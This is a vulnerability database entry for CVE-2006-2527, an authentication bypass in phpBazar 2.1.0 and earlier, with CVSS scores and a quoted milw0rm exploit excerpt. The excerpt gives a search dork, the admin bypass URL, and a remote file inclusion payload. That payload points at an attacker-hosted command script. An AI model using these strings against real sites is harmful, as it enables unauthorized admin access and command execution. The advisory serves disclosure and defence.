7.5
CVSSv2

CVE-2006-2527

Published: 22/05/2006 Updated: 18/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Admin/admin.php in phpBazar 2.1.0 and previous versions allows remote malicious users to bypass the authentication process and gain unauthorized access to the administrative section by setting the action parameter to edit_member and the value parameter to 1.

Vulnerable Product Search on Vulmon Subscribe to Product

smartisoft phpbazar 2.1.0

Exploits

Title: phpBazar <= 210 Multiple vulnerabilites URL: wwwsmartisoftcom/ Dork: inurl:classifiedphp phpbazar Exploits: -remote file inclusion: /classified_rightphp?language_dir=yourhost/cmdgif?cmd=ls -access to admin login and password: /admin/adminphp?action=edit_member&value=1 # milw0rmcom [2006-05-19] ...